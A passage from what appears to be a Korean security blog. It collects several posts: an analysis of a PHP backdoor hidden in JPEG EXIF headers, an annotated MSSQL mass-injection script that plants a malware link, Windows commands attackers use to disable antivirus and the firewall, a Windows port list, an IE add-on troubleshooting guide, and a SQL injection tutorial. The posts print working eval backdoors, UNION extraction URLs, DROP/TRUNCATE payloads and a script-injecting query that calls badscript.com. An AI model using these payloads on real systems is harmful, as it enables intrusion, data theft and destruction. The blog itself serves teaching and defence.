posted by 블르샤이닝 2013. 7. 17. 10:28

http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SucuriSecurity+%28Sucuri+Security%29


Decoding the encoded URL: http://ddecode.com/phpdecoder/?results=4e57b421cfdfc940c3df55c2bbecb408


Malware Hidden Inside JPG EXIF Headers

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. This is what we found in the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');


Both functions are harmless by themselves. Exif_read_data is commonly used to read images and preg_replace to replace the content of strings. However, preg_replace has a hidden and tricky option where if you pass the “/e” modifier it will execute the content (eval), instead of just searching/replacing.

When we look at the bun.jpg file, we find the second part of the backdoor:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

The file starts normally with the common headers, but in the "Make" header it has a strange keyword: "/.*/e". That's the exact modifier used by preg_replace to execute (eval) whatever is passed to it.

Now things are getting interesting...

If we keep looking at the EXIF data, we can see the "eval ( base64_decode" hidden inside the "Model" header. When we put it all together, we can see what is going on: the attackers read both the Make and Model headers from the EXIF and feed them to preg_replace as its pattern and replacement arguments. Once we substitute $exif['Make'] and $exif['Model'] with what is in the file, we get the final backdoor:

preg_replace("/.*/e", '@ eval ( base64_decode("aWYgKGl ..."));', '');

Once decoded, we can see that it just executes whatever content is provided by the POST variable zz1. The full decoded backdoor is here:

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"])); }

Steganography Malware

Another interesting point is that bun.jpg and other images that were compromised, still load and work properly. In fact, on these compromised sites, the attackers modified a legit, pre-existent image from the site. This is a curious steganographic way to hide the malware.

Note: Any Sucuri clients using Server Side Scanning are protected against this type of injection (it is detected by us).
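The detection side of the write-up above, as an added example (not code from Sucuri or from this blog): a minimal JPEG/EXIF walker that pulls the Make and Model tags out of the APP1 segment and flags the two traits the backdoor relies on, a PCRE pattern carrying the /e modifier and PHP code where a camera string belongs. The JPEG it scans is constructed inline; the base64 in the suspect sample is the harmless string "constructed", not the page's payload.

```python
import re
import struct

# EXIF/TIFF tag ids used by the backdoor described above.
TAG_MAKE = 0x010F
TAG_MODEL = 0x0110
TAG_NAMES = {TAG_MAKE: "Make", TAG_MODEL: "Model"}

# A PCRE pattern whose modifier list contains "e" (the eval modifier preg_replace honoured
# before PHP 7), e.g. "/.*/e".
PREG_E_MODIFIER = re.compile(r"^/.*/[a-zA-Z]*e[a-zA-Z]*$", re.S)
# PHP code sitting where a camera maker/model string belongs.
PHP_CODE = re.compile(r"\b(eval|base64_decode|assert|system|passthru|shell_exec)\s*\(", re.I)


def build_sample_jpeg(make, model):
    """Construct a minimal JPEG (SOI + APP1/Exif + EOI) whose IFD0 carries Make and Model.
    Constructed test data for this example, not the bun.jpg from the write-up."""
    make_b = make.encode("latin-1") + b"\x00"
    model_b = model.encode("latin-1") + b"\x00"
    ifd_offset = 8                                   # IFD0 directly after the TIFF header
    data_start = ifd_offset + 2 + 12 * 2 + 4         # count + 2 entries + next-IFD pointer
    entries = struct.pack("<HHII", TAG_MAKE, 2, len(make_b), data_start)
    entries += struct.pack("<HHII", TAG_MODEL, 2, len(model_b), data_start + len(make_b))
    tiff = (b"II*\x00" + struct.pack("<I", ifd_offset) + struct.pack("<H", 2)
            + entries + struct.pack("<I", 0) + make_b + model_b)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def _parse_ifd0(tiff):
    """Read the ASCII Make/Model entries of IFD0 from a TIFF blob (either byte order)."""
    endian = "<" if tiff[:2] == b"II" else ">"
    magic, ifd_offset = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    (count,) = struct.unpack(endian + "H", tiff[ifd_offset:ifd_offset + 2])
    fields = {}
    for i in range(count):
        off = ifd_offset + 2 + 12 * i
        tag, typ, n, value = struct.unpack(endian + "HHII", tiff[off:off + 12])
        if tag in TAG_NAMES and typ == 2:            # type 2 = ASCII, NUL-terminated
            raw = tiff[off + 8:off + 8 + n] if n <= 4 else tiff[value:value + n]
            fields[TAG_NAMES[tag]] = raw.rstrip(b"\x00").decode("latin-1")
    return fields


def read_exif_make_model(data):
    """Walk the JPEG segment chain up to the first scan and return Make/Model from APP1/Exif."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(data):
        marker, seg_len = struct.unpack(">HH", data[pos:pos + 4])
        if marker in (0xFFDA, 0xFFD9):               # start of scan / end of image: stop
            break
        payload = data[pos + 4:pos + 2 + seg_len]
        if marker == 0xFFE1 and payload.startswith(b"Exif\x00\x00"):
            return _parse_ifd0(payload[6:])
        pos += 2 + seg_len
    return {}


def scan_image(data):
    """Return a list of findings for EXIF fields that look like the preg_replace /e backdoor."""
    findings = []
    for name, value in read_exif_make_model(data).items():
        if PREG_E_MODIFIER.match(value):
            findings.append(f"{name} holds a PCRE pattern with the /e (eval) modifier: {value!r}")
        if PHP_CODE.search(value):
            findings.append(f"{name} holds PHP code instead of a camera string: {value!r}")
    return findings


if __name__ == "__main__":
    clean = build_sample_jpeg("Canon", "EOS 5D")
    # Same shape as the backdoor's headers; the base64 is the constructed string "constructed".
    bad = build_sample_jpeg("/.*/e", '@ eval ( base64_decode("Y29uc3RydWN0ZWQ="));')
    print("clean:", scan_image(clean))
    print("suspect:", scan_image(bad))
```

The scan stops at the first SOS marker, so it costs a few hundred bytes per file however large the image is, which makes it cheap to run over an uploads directory. A second check worth adding in the same sweep is a grep of the PHP tree for `preg_replace` calls whose first argument is not a literal, since the image is inert until such a call reads it.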

posted by 블르샤이닝 2012. 10. 24. 11:15


Documents and materials exist to be read; collecting them without reading them is just empty show-off, isn't it... so I have been doing it wrong. Since I'm posting this anyway, I should read it. Ugh... time for some reflection.

-----------------------------------------------------------------------------------------------------

// The goal is to pick, from every user-created table in the DB, the columns whose data type is text

and insert into them a script ( ... ) that sends visitors to a malware-distributing site.

The SQL uses T-SQL syntax and the target DBMS is MSSQL.


////////////////Injected SQL statement//////////////////////////////


;declare @t varchar(255), @c varchar(255)

declare table_cursor cursor for select a.name, b.name from sysobjects a, syscolumns b

where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

open table_cursor

fetch next from table_cursor into @t, @c

while(@@fetch_status=0)

begin

exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(4000),['+@c+']))+

cast( ... as varchar(53))')

fetch next from table_cursor into @t,@c

end

close table_cursor

deallocate table_cursor;


///////////////////////////////////////////////////////////////


**********************Explanation***************************

;declare @t varchar(255), @c varchar(255)

// The leading ';' terminates the SQL statement that the web page builds from its parameter; then two varchar(255) variables, @t and @c, are declared

declare table_cursor cursor for select a.name, b.name from sysobjects a, syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

// Query the catalog tables that hold the system information (sysobjects, syscolumns)
// Rows of sysobjects with xtype='u' are the user-created tables in the database
// In syscolumns, xtype 99 is ntext, 35 is text, 231 is nvarchar and 167 is varchar,
// so the select returns every column of those tables whose type is a string type

open table_cursor                          // open the cursor over the select statement

fetch next from table_cursor into @t, @c   // put the table name from the cursor into @t and the column name into @c

while(@@fetch_status=0)                    // loop while the last fetch returned a row

begin                                      // start of loop

exec('update ['+@t+'] set ['+@c+']=rtrim   // strip trailing whitespace
(convert(varchar(4000),['+@c+']))+         // convert the column's data to varchar(4000)
cast( ... as varchar(53))')                // cast the malware-site string being injected to varchar(53)

fetch next from table_cursor into @t,@c    // fetch the next table and column, then loop

end

close table_cursor                         // close the cursor
deallocate table_cursor;                   // release the cursor


*********************************************************************


That is all. Thanks for reading.


posted by 블르샤이닝 2012. 3. 5. 12:10
When you use a firewall in a company, or even just the Windows firewall on a single machine, you often need to open ports for a particular program (service).

The material below is a document that lists the ports used by each Windows service.

Port | Protocol | Application protocol | System service name
---- | -------- | -------------------- | -------------------
n/a | GRE | GRE (IP protocol 47) | Routing and Remote Access
n/a | ESP | IPsec ESP (IP protocol 50) | Routing and Remote Access
n/a | AH | IPsec AH (IP protocol 51) | Routing and Remote Access
7 | TCP | Echo | Simple TCP/IP Services
7 | UDP | Echo | Simple TCP/IP Services
9 | TCP | Discard | Simple TCP/IP Services
9 | UDP | Discard | Simple TCP/IP Services
13 | TCP | Daytime | Simple TCP/IP Services
13 | UDP | Daytime | Simple TCP/IP Services
17 | TCP | Quotd | Simple TCP/IP Services
17 | UDP | Quotd | Simple TCP/IP Services
19 | TCP | Chargen | Simple TCP/IP Services
19 | UDP | Chargen | Simple TCP/IP Services
20 | TCP | FTP default data | FTP Publishing Service
21 | TCP | FTP control | FTP Publishing Service
21 | TCP | FTP control | Application Layer Gateway Service
23 | TCP | Telnet | Telnet
25 | TCP | SMTP | Simple Mail Transfer Protocol
25 | TCP | SMTP | Exchange Server
42 | TCP | WINS replication | Windows Internet Name Service
42 | UDP | WINS replication | Windows Internet Name Service
53 | TCP | DNS | DNS Server
53 | UDP | DNS | DNS Server
53 | TCP | DNS | Internet Connection Firewall/Internet Connection Sharing
53 | UDP | DNS | Internet Connection Firewall/Internet Connection Sharing
67 | UDP | DHCP Server | DHCP Server
67 | UDP | DHCP Server | Internet Connection Firewall/Internet Connection Sharing
69 | UDP | TFTP | Trivial FTP Daemon Service
80 | TCP | HTTP | Windows Media Services
80 | TCP | HTTP | World Wide Web Publishing Service
80 | TCP | HTTP | SharePoint Portal Server
88 | TCP | Kerberos | Kerberos Key Distribution Center
88 | UDP | Kerberos | Kerberos Key Distribution Center
102 | TCP | X.400 | Microsoft Exchange MTA Stacks
110 | TCP | POP3 | Microsoft POP3 Service
110 | TCP | POP3 | Exchange Server
119 | TCP | NNTP | Network News Transfer Protocol
123 | UDP | NTP | Windows Time
123 | UDP | SNTP | Windows Time
135 | TCP | RPC | Message Queuing
135 | TCP | RPC | Remote Procedure Call
135 | TCP | RPC | Exchange Server
135 | TCP | RPC | Certificate Services
135 | TCP | RPC | Cluster Service
135 | TCP | RPC | Distributed File System
135 | TCP | RPC | Distributed Link Tracking
135 | TCP | RPC | Distributed Transaction Coordinator
135 | TCP | RPC | Distributed File Replication Service
135 | TCP | RPC | Fax Service
135 | TCP | RPC | Microsoft Exchange Server
135 | TCP | RPC | File Replication Service
135 | TCP | RPC | Group Policy
135 | TCP | RPC | Local Security Authority
135 | TCP | RPC | Remote Storage Notification
135 | TCP | RPC | Remote Storage Server
135 | TCP | RPC | Systems Management Server 2.0
135 | TCP | RPC | Terminal Services Licensing
135 | TCP | RPC | Terminal Services Session Directory
137 | UDP | NetBIOS Name Resolution | Computer Browser
137 | UDP | NetBIOS Name Resolution | Server
137 | UDP | NetBIOS Name Resolution | Windows Internet Name Service
137 | UDP | NetBIOS Name Resolution | Net Logon
137 | UDP | NetBIOS Name Resolution | Systems Management Server 2.0
138 | UDP | NetBIOS Datagram Service | Computer Browser
138 | UDP | NetBIOS Datagram Service | Messenger
138 | UDP | NetBIOS Datagram Service | Server
138 | UDP | NetBIOS Datagram Service | Net Logon
138 | UDP | NetBIOS Datagram Service | Distributed File System
138 | UDP | NetBIOS Datagram Service | Systems Management Server 2.0
138 | UDP | NetBIOS Datagram Service | License Logging Service
139 | TCP | NetBIOS Session Service | Computer Browser
139 | TCP | NetBIOS Session Service | Fax Service
139 | TCP | NetBIOS Session Service | Performance Logs and Alerts
139 | TCP | NetBIOS Session Service | Print Spooler
139 | TCP | NetBIOS Session Service | Server
139 | TCP | NetBIOS Session Service | Net Logon
139 | TCP | NetBIOS Session Service | Remote Procedure Call Locator
139 | TCP | NetBIOS Session Service | Distributed File System
139 | TCP | NetBIOS Session Service | Systems Management Server 2.0
139 | TCP | NetBIOS Session Service | License Logging Service
143 | TCP | IMAP | Exchange Server
161 | UDP | SNMP | SNMP Service
162 | UDP | SNMP Traps Outbound | SNMP Trap Service
389 | TCP | LDAP Server | Local Security Authority
389 | UDP | LDAP Server | Local Security Authority
389 | TCP | LDAP Server | Distributed File System
389 | UDP | LDAP Server | Distributed File System
443 | TCP | HTTPS | HTTP SSL
443 | TCP | HTTPS | World Wide Web Publishing Service
443 | TCP | HTTPS | SharePoint Portal Server
443 | TCP | RPC over HTTPS | Exchange Server 2003
445 | TCP | SMB | Fax Service
445 | TCP | SMB | Print Spooler
445 | TCP | SMB | Server
445 | TCP | SMB | Remote Procedure Call Locator
445 | TCP | SMB | Distributed File System
445 | TCP | SMB | License Logging Service
445 | TCP | SMB | Net Logon
464 | UDP | Kerberos Password V5 | Kerberos Key Distribution Center
464 | TCP | Kerberos Password V5 | Kerberos Key Distribution Center
500 | UDP | IPsec ISAKMP | Local Security Authority
515 | TCP | LPD | TCP/IP Print Server
548 | TCP | File Server for Macintosh | File Server for Macintosh
554 | TCP | RTSP | Windows Media Services
563 | TCP | NNTP over SSL | Network News Transfer Protocol
593 | TCP | RPC over HTTPS endpoint mapper | Remote Procedure Call
593 | TCP | RPC over HTTPS | Exchange Server
636 | TCP | LDAP SSL | Local Security Authority
636 | UDP | LDAP SSL | Local Security Authority
993 | TCP | IMAP over SSL | Exchange Server
995 | TCP | POP3 over SSL | Exchange Server
1067 | TCP | Installation Bootstrap Service | Installation Bootstrap Protocol Server
1068 | TCP | Installation Bootstrap Service | Installation Bootstrap Protocol Client
1270 | TCP | MOM-Encrypted | Microsoft Operations Manager 2000
1433 | TCP | SQL over TCP | Microsoft SQL Server
1433 | TCP | SQL over TCP | MSSQL$UDDI
1434 | UDP | SQL Probe | Microsoft SQL Server
1434 | UDP | SQL Probe | MSSQL$UDDI
1645 | UDP | Legacy RADIUS | Internet Authentication Service
1646 | UDP | Legacy RADIUS | Internet Authentication Service
1701 | UDP | L2TP | Routing and Remote Access
1723 | TCP | PPTP | Routing and Remote Access
1755 | TCP | MMS | Windows Media Services
1755 | UDP | MMS | Windows Media Services
1801 | TCP | MSMQ | Message Queuing
1801 | UDP | MSMQ | Message Queuing
1812 | UDP | RADIUS Authentication | Internet Authentication Service
1813 | UDP | RADIUS Accounting | Internet Authentication Service
1900 | UDP | SSDP | SSDP Discovery Service
2101 | TCP | MSMQ-DC | Message Queuing
2103 | TCP | MSMQ-RPC | Message Queuing
2105 | TCP | MSMQ-RPC | Message Queuing
2107 | TCP | MSMQ-Mgmt | Message Queuing
2393 | TCP | OLAP Services 7.0 | SQL Server: Downlevel OLAP Client Support
2394 | TCP | OLAP Services 7.0 | SQL Server: Downlevel OLAP Client Support
2460 | UDP | MS Theater | Windows Media Services
2535 | UDP | MADCAP | DHCP Server
2701 | TCP | SMS Remote Control (control) | SMS Remote Control Agent
2701 | UDP | SMS Remote Control (control) | SMS Remote Control Agent
2702 | TCP | SMS Remote Control (data) | SMS Remote Control Agent
2702 | UDP | SMS Remote Control (data) | SMS Remote Control Agent
2703 | TCP | SMS Remote Chat | SMS Remote Control Agent
2703 | UDP | SMS Remote Chat | SMS Remote Control Agent
2704 | TCP | SMS Remote File Transfer | SMS Remote Control Agent
2704 | UDP | SMS Remote File Transfer | SMS Remote Control Agent
2725 | TCP | SQL Analysis Services | SQL Analysis Server
2869 | TCP | UPNP | Universal Plug and Play Device Host
2869 | TCP | SSDP event notification | SSDP Discovery Service
3268 | TCP | Global Catalog Server | Local Security Authority
3269 | TCP | Global Catalog Server | Local Security Authority
3343 | UDP | Cluster Service | Cluster Service
3389 | TCP | Terminal Services | NetMeeting Remote Desktop Sharing
3389 | TCP | Terminal Services | Terminal Services
3527 | UDP | MSMQ-Ping | Message Queuing
4011 | UDP | BINL | Remote Installation
4500 | UDP | NAT-T | Local Security Authority
5000 | TCP | SSDP legacy event notification | SSDP Discovery Service
5004 | UDP | RTP | Windows Media Services
5005 | UDP | RTCP | Windows Media Services
6001 | TCP | Information Store | Exchange Server 2003
6002 | TCP | Directory Referral | Exchange Server 2003
6004 | TCP | DSProxy/NSPI | Exchange Server 2003
42424 | TCP | ASP.NET Session State | ASP.NET State Service
51515 | TCP | MOM-Clear | Microsoft Operations Manager 2000
1024-65535 | TCP | RPC | Randomly allocated high TCP ports

For more details, see http://support.microsoft.com/kb/832017. That document covers not only Windows itself but also frequently used programs such as SQL Server.
posted by 블르샤이닝 2012. 2. 23. 11:14

Hacking commands frequently used by Chinese hackers

1. ver - check the system version

2. tasklist - list the running processes

3. taskkill - kill selected processes
Usage: taskkill /f /im 360safe.exe or taskkill /f /pid 3389

4. net start - start a service
Usage: net start, net start w3svc (starts IIS)

5. net stop - stop the specified service
Usage: net stop, net stop sharedaccess (stops the Windows firewall)

6. cacls - change and apply file permissions
Usage: cacls c:\windows\mm.exe /P everyone:R or cacls c:\progra~1\rising\ravmond.exe /d:everyone

7. & - run several commands on one line
Usage: del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe

8. echo y| - answers Y automatically when a "Proceed (Y/N)?" prompt appears
Usage: echo y| cacls c:\windows\mm.exe /P everyone:R

9. net user/group

10. shutdown
--------------------------------------------------------------------------------------------------
The functions above are techniques that mostly turn up in bots. In particular, injection through the calculator has been used often recently to get around system-privilege problems, while the other functions have been in use for a long time.
Also, in anti-reversing, it is found from time to time that a debugger entry is set in the registry so that antivirus does not run normally... if I post that part later, I think some of you will find it interesting ^^
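As an added example that is not part of the original post, here is what the commands listed above look like from the monitoring side: a handful of rules over process-creation events that flag the specific uses the post names (stopping sharedaccess, killing 360safe/ravmond, deleting sethc.exe, loosening ACLs with cacls, the echo y| auto-confirm), plus a context tag when the shell was spawned by a web server process. The events are constructed for the example, and the `(parent, command line)` shape is an assumption standing in for a 4688 or Sysmon record.

```python
import re

# Constructed process-creation events: (parent image, command line). The shape mirrors what a
# Windows 4688 or Sysmon event exposes; none of these lines is real telemetry.
SAMPLE_EVENTS = [
    ("w3wp.exe", "cmd.exe /c net stop sharedaccess"),
    ("w3wp.exe", "cmd.exe /c taskkill /f /im 360safe.exe"),
    ("explorer.exe", "tasklist"),
    ("w3wp.exe", r"cmd.exe /c del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe"),
    ("explorer.exe", "net start w3svc"),
    ("w3wp.exe", r"cmd.exe /c echo y| cacls c:\windows\mm.exe /P everyone:R"),
]

# One rule per command the post lists; each is benign in isolation and suspicious as used there.
RULES = [
    ("firewall-disable", re.compile(r"\bnet\s+stop\s+sharedaccess\b", re.I)),
    ("security-tool-kill", re.compile(r"\btaskkill\b.*?/im\s+\S*(360safe|ravmond)", re.I)),
    ("sethc-tamper", re.compile(r"\bdel\b.*\bsethc\.exe\b", re.I)),
    ("acl-tamper", re.compile(r"\bcacls\b.*?(/[pP]\s+everyone:R|/[dD][:\s]*everyone)", re.I)),
    ("echo-y-pipe", re.compile(r"\becho\s+y\s*\|", re.I)),
]
WEB_SERVER_PARENTS = {"w3wp.exe", "iisexpress.exe"}


def classify(parent, cmdline):
    """Return the rule names a single event trips, plus a context tag for shells spawned by IIS."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if parent.lower() in WEB_SERVER_PARENTS and re.match(r"\s*cmd\.exe\b", cmdline, re.I):
        hits.append("shell-from-webserver")
    return hits


def triage(events):
    """Keep only the events that trip at least one rule, with their tags."""
    out = []
    for parent, cmdline in events:
        tags = classify(parent, cmdline)
        if tags:
            out.append((cmdline, tags))
    return out


if __name__ == "__main__":
    for cmdline, tags in triage(SAMPLE_EVENTS):
        print(tags, "<-", cmdline)
```

The parent-process tag is the one that matters most in practice: `net start w3svc` typed by an administrator is routine, while any `cmd.exe` whose parent is `w3wp.exe` deserves a look regardless of what follows it.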


posted by 블르샤이닝 2012. 2. 22. 20:05
Source: http://hummingbird.tistory.com/3488

When using a computer, you may install various pieces of software by choice or have them installed without your knowledge, and a bug in one of those programs can leave the Internet Explorer web browser unable to run.


If an error message appears in such a case you have at least some chance of finding the program causing the problem, but when the browser starts, shows no menu and freezes, as in the picture, it can be hard to know where to begin.

The first thing to suspect: when Internet Explorer runs it creates the iexplore.exe process, and the add-ons loaded into that process need to be checked.


One way to start Internet Explorer in an emergency is to click the Start button, right-click the "Internet Explorer" icon that is shown, and choose "Browse without add-ons".


Alternatively, running "Start → Run → about:NoAdd-ons" also starts Internet Explorer with add-ons disabled, so keep that in mind.


A browser that would not start before should now run in this restricted environment.


Open the browser's "Tools → Manage Add-ons" menu and select each add-on registered under "Toolbars and Extensions" one by one: ① use "More information" to check the associated program (file) and look for anything suspicious, and ② set unwanted programs such as adware to "Disable".

Once everything is done, close Internet Explorer and then start it normally to check that it works.

If the browser works normally after you disable a particular item in Manage Add-ons, find the program linked to that item and remove it through Control Panel or delete the related program manually.

Finally, in Korea there are very many cases of programs registering themselves in Internet Explorer as Browser Helper Objects (BHOs) through a wide range of distribution channels, and some of them can cause a variety of problems while you browse, so this procedure is worth knowing.
 
posted by 블르샤이닝 2012. 2. 21. 16:08

SQL Injection and Cross-Site Scripting

Filed under: Penetration Testing, Security articles - 17 Feb 2012

Introduction

For the past couple of months, I have been helping to patch several legacy web applications against Cross-Site Scripting and SQL Injection vulnerabilities. I found lots of articles on this topic through Google, but reading about it and experimenting with it are two very different things. So I decided to put together a small sample code to examine the vulnerabilities that I found. You are welcome to download this sample code.

12/20/2010 – Added example to demonstrate JavaScript Event injection vulnerability.

What is SQL Injection and Cross-site scripting?

Cross-Site Scripting (XSS or CSS)
• Enables malicious attackers to inject client-side script (JavaScript) or HTML markup into web pages viewed by other users.

SQL Injection
• Insertion of a SQL query via the input data from the client to the application, which is later passed to an instance of SQL Server for parsing and execution.
• Very common in PHP and Classic ASP applications.

SQL Injection and Cross-Site Scripting attacks are not new topics. Read more about them from:
• Cross-Site Scripting
• SQL Injection – MSDN
• SQL Injection – Wikipedia

The mentioned vulnerabilities can occur via the
1. Query string
2. Form input box

Sample Application

Steps to Set Up the Sample Application

1. Create a new database and name it TestDB.
2. Create a new login and map it to TestDB.
3. Run the TestDBSetup.sql.

Steps to Run the Sample Application

1. This sample code requires Visual Studio 2008 or newer, if you don’t have it, download the 90-day trial edition from Microsoft (Click Here).
2. Download the sample code and unzip it.
3. Update the connectionString in the web.config.
4. Run the application and follow the sample described in this article. Make sure to remove any line break from the sample URL when copy and paste.
5. Shown below is the structure of the sample code.

Figure 1 
File structure

Query string

SQL Injection

Definition: Insertion of a SQL query via the input data from the client to the application that are later passed to an instance of SQL Server for parsing and execution.

UNION SQL Injection

We will use the UNION statement to enumerate all the table names in the database. The two consecutive hyphens "--" indicate a SQL comment. See below: the comment is shown in green, and the part of the statement after the hyphens will not be evaluated by the SQL server.

Listing 1

SELECT * FROM dbo.MyComments WHERE ID = 1 --ORDER BY [Name]

Execute the URL shown below.

Listing 2

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL FROM INFORMATION_SCHEMA.TABLES--

It will yield the error "All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists." This error message appears when a UNION, INTERSECT or EXCEPT query does not have the same number of expressions in each of its SELECT lists. The workaround is to keep adding NULL expressions to the URL until the error message disappears.

Listing 3

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, NULL FROM INFORMATION_SCHEMA.TABLES--

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES--

The error message disappears once every SELECT in the UNION has the same number of expressions. Next, try replacing each NULL value with TABLE_NAME. If you get an error message, leave that position as NULL.

Listing 4

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME, NULL, NULL FROM INFORMATION_SCHEMA.TABLES--

Results
Figure 2

Table name

From the output displayed above, we know that the database contains several tables namely MyComments, tbl_SQLInjection, tbl_users and TestTable.

Next, we will extract every column name in the tbl_users table. Execute the URL shown in listing 5.

Listing 5

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'tbl_users'--

Result
Figure 3
tbl_users column

From the output displayed above, we can see that tbl_users contains the columns address, password, phone, secret, secret2 and username. To confirm this, shown below is a snapshot of the tbl_users table schema from the SQL server.

Figure 4
tbl_users column SQL

Repeat the same step with a different table name.

Listing 6

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, COLUMN_NAME, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'MyComments'-- …

Let's retrieve the data stored in the tbl_users table. %2b and %27 are the URL encodings of the "+" and "'" characters respectively. Execute the URL shown below with the string highlighted in grey.

Listing 7

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, username%2B%27 - %27%2Bpassword, secret%2B%27 - %27%2Bsecret2, address, phone%2B%27 - %27%2Baddress, NULL, NULL FROM tbl_users--

Results
Figure 5
tbl_users content

To confirm this, shown below is a snapshot of the tbl_users table contents. Repeat the same step for the rest of the tables.

Figure 6
tbl_users content SQL

Retrieve data from sysprocesses table

We can also retrieve the SQL server instance name, login name, database name, SQL server version, etc. from the master..sysprocesses table. Execute the URL below and observe the output.

Listing 8

http://localhost:1234/Sample/ListComments.aspx?cid=1 UNION SELECT NULL, DB_Name([dbid]) %2B CHAR(0x2d) %2B loginame, net_address, hostname %2B CHAR(0x2d) %2B %40%40ServerName, %40%40version, NULL, NULL FROM master..sysprocesses--

 

UPDATE the table

Listing 9

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE tbl_Users SET Password = 'HACKED' WHERE username = 'test@test.com' --

Result
Figure 7
Modify password SQL

DELETE the data in the table

Listing 10

http://localhost:1234/Sample/ListComments.aspx?cid=99999 DELETE FROM tbl_Users WHERE username = 'test@test.com' --

TRUNCATE the table

Listing 11

http://localhost:1234/Sample/ListComments.aspx?cid=99999 TRUNCATE TABLE tbl_Users --

DROP the table

Listing 12

http://localhost:1234/Sample/ListComments.aspx?cid=99999 DROP TABLE tbl_Users --

Hex based SQL injection

Once in a while, we will see some strange entries as listed below in the server log file.

Listing 13

http://www.YourDomain.com/SomePage.asp?id=1 &cat=c
DECLARE%20@S%20NVARCHAR(4000);
SET%20@S=CAST(4445434c415245204054207661726368617228323535292c40432076617263…

Which, when decoded to a string, becomes (PLEASE DO NOT COPY AND RUN THIS QUERY)

Listing 14

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
 select a.name,b.name from sysobjects a,syscolumns b
 where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231
 or b.xtype=167)
 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
 BEGIN
 exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://badscript.com/bad.js">
 </script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script
 src="http://badscript.com/bad.js"></script><!--''')
 FETCH NEXT FROM
 Table_Cursor INTO @T,@C END CLOSE
 Table_Cursor DEALLOCATE Table_Cursor

The above query finds every text column in every user table of the database and appends a malicious script tag to its contents.

Example

Shown below is a URL with a query string to retrieve comment from the SQL server by comment id.

http://localhost:1234/Sample/ListComments.aspx?cid=1

For the sake of simplicity, I'm using a simple update statement to update the table. The "UPDATE dbo.MyComments SET test='HACKED'" query looks like 0x5550444154452064626f2e4d79436f6d6d656e74732053455420746573743d274841434b454427 in hexadecimal. %3b is the URL encoding of the ";" character. Append the string highlighted in grey to the URL. See below.

Listing 15

http://localhost:1234/Sample/ListComments.aspx?cid=1 DECLARE @S VARCHAR(255) SET @s=CAST(0x5550444154452064626f2e4d79436f6d6d656e74732053455420746573743d274841434b454427 AS VARCHAR(255)) exec (@s)--
Or
http://localhost:1234/Sample/ListComments.aspx?cid=1 DECLARE @S VARCHAR(255)SET @s=CAST(0x5550444154452064626f2e4d79436f6d6d656e74732053455420746573743d274841434b454427 AS VARCHAR(255)) exec (@s)--

Before executing the above URL

Figure 8
Before executing

After executing the above URL

Figure 9
After qs injection

Quick test

Append the below string to your web pages URL that take parameters.

Listing 16

http://localhost:1234/Sample/ListComments.aspx?cid=1 DECLARE @S VARCHAR(500) SET @s= CAST(0x4946204f424a4543545f4944282774626c5f53514c496e6a656374696f6e272c27552729204953204e554c4c20435245415445205441424c452064626f2e5b74626c5f53514c496e6a656374696f6e5d285b4f75747075745d205b766172636861725d2835303029204e554c4c2920494e5345525420494e544f2064626f2e74626c5f53514c496e6a656374696f6e2053454c454354202770616765202d205375626a65637420746f2053514c20496e6a656374696f6e27 as VARCHAR(500))Exec(@s)--

